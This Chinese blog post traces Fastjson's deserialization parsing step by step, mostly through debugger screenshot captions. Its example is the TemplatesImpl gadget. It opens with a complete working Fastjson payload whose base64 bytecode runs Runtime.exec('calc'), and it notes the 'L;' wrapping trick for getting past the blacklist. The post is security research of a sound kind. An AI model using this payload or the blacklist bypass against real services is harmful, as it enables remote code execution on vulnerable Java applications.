0
点赞
收藏
分享

微信扫一扫

Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)


文章目录

  • ​​写在前面​​
  • ​​流程分析​​

写在前面

关于TemplatesImpl加载字节码就不多说了,之前也写过自己翻一翻,或者网上看看其他大佬的,至于为什么选择这一个,因为这里面大多数过程都有,除了​​$ref​​,算是比较全面了

流程分析

核心代码

public class test1 {
public static void main(String[] args) throws Exception{

String payload = "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_bytecodes\":[\"yv66vgAAADIANAoABwAlCgAmACcIACgKACYAKQcAKgoABQAlBwArAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAtManNvbi9UZXN0OwEACkV4Y2VwdGlvbnMHACwBAAl0cmFuc2Zvcm0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsHAC0BAARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABGFyZ3MBABNbTGphdmEvbGFuZy9TdHJpbmc7AQABdAcALgEAClNvdXJjZUZpbGUBAAlUZXN0LmphdmEMAAgACQcALwwAMAAxAQAEY2FsYwwAMgAzAQAJanNvbi9UZXN0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAE2phdmEvaW8vSU9FeGNlcHRpb24BADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABNqYXZhL2xhbmcvRXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAUABwAAAAAABAABAAgACQACAAoAAABAAAIAAQAAAA4qtwABuAACEgO2AARXsQAAAAIACwAAAA4AAwAAABEABAASAA0AEwAMAAAADAABAAAADgANAA4AAAAPAAAABAABABAAAQARABIAAQAKAAAASQAAAAQAAAABsQAAAAIACwAAAAYAAQAAABcADAAAACoABAAAAAEADQAOAAAAAAABABMAFAABAAAAAQAVABYAAgAAAAEAFwAYAAMAAQARABkAAgAKAAAAPwAAAAMAAAABsQAAAAIACwAAAAYAAQAAABwADAAAACAAAwAAAAEADQAOAAAAAAABABMAFAABAAAAAQAaABsAAgAPAAAABAABABwACQAdAB4AAgAKAAAAQQACAAIAAAAJuwAFWbcABkyxAAAAAgALAAAACgACAAAAHwAIACAADAAAABYAAgAAAAkAHwAgAAAACAABACEADgABAA8AAAAEAAEAIgABACMAAAACACQ=\"],'_name':'a.b','_tfactory':{ },\"_outputProperties\":{ }}";
JSON.parseObject(payload, Feature.SupportNonPublicField);

}
}

​JSON#parseObject()​​​方法会调用​​DefaultJSONParser#parse()​​​,在实例化​​DefaultJSONParser​​​类是会将输入数据使用实例化​​JSONScanner​​​类传入,并同时传入配置​​features​

Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)_json


设置后面的参数

Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)_java_02


继续往后面这里,看看​​JSONScanner​​干了什么

Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)_加载_03


首先调用父类构造方法,获取输入与长度,调用next

Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)_json_04


逻辑很简单,不断去后一位直到字符串尾

Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)_java_05


接着回到​​DefaultJSONParser​​,由于首位是​​{​​设置​​token​​为12

Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)_java_06


调用​​DefaultJSONParser​​​的​​parse​​方法,并传入全局配置

Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)_加载_07

包括黑名单之类的

Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)_加载_08

由于是token之前设置了是​​12​

Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)_加载_09


创建​​JSONObject​​类对象,是HashMap

Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)_实例化_10


然后再调用 ​​DefaultJSONParser#parseObject(java.util.Map, java.lang.Object)​​方法去解析

Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)_实例化_11


接下来读取字符判断是否​​ch=='"'​​,TRUE就获取其中的字段的值​​@type​​并紧接着判断​​key == JSON.DEFAULT_TYPE_KEY​​相等,这个​​JSON.DEFAULT_TYPE_KEY​​就是​​@type​

Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)_加载_12


获取​​@type​

Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)_加载_13


判断

Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)_json_14


接下来调用​​loadClass​

Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)_java_15


这里也看到了之前说的绕过黑名单的小技巧用​​L;​​包裹

Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)_json_16


接下来加载返回我们的类

Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)_json_17

接下来执行反序列化

Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)_加载_18


接下来我们谈一谈​​_outputProperties​​​到​​getOutputProperties​​​的转化过程,重点是​​smartMatch​​的过程

Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)_java_19


这里对下划线进行了替换为空的操作

Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)_实例化_20


这也就回答了上面的问题,接下来的就不必多说了,看看函数调用栈就好了

Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)_java_21


举报

相关推荐

0 条评论